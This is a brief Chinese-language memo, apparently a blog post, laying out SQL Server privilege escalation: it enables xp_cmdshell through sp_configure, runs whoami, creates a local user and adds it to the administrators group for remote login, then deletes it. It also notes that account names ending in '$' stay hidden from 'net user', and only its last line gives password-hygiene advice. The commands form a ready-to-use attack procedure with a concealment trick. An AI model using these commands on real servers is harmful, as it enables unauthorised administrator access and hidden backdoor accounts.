Navicat
一、开启相应组件SELECT @@versionselect @@spidSELECT @@SPID AS 'ID', SYSTEM_USER AS 'Login Name', USER AS 'User Name';USE masterGOexec sp_configure 'show advanced options',1goRECONFIGUREGOEXEC sp_configure 'xp_cmdshell',1goRECONFIGUREGO
二、查询服务器运行状态exec master.dbo.xp_cmdshell 'query user'exec master..xp_cmdshell 'whoami'
三、新建服务器管理员权限账号exec master.dbo.xp_cmdshell 'net user'exec master.dbo.xp_cmdshell 'net user XXname XXpass@word /add'exec master..xp_cmdshell 'net localgroup administrators XXname /add'exec master..xp_cmdshell 'net user'
四、远程控制数据库服务器利用新建的XXname账号登陆到数据库服务器
五、删除新建的账号exec master.dbo.xp_cmdshell 'net user XXname'exec master..xp_cmdshell 'net user XXname /del'
新建带$符号的账号,在系统命令行里是不显示的Eg:'net user xx$ xxpossword /add'
安全管理员对数据库账号和服务器账号设置复杂度并定期更改密码,防止提权事件发生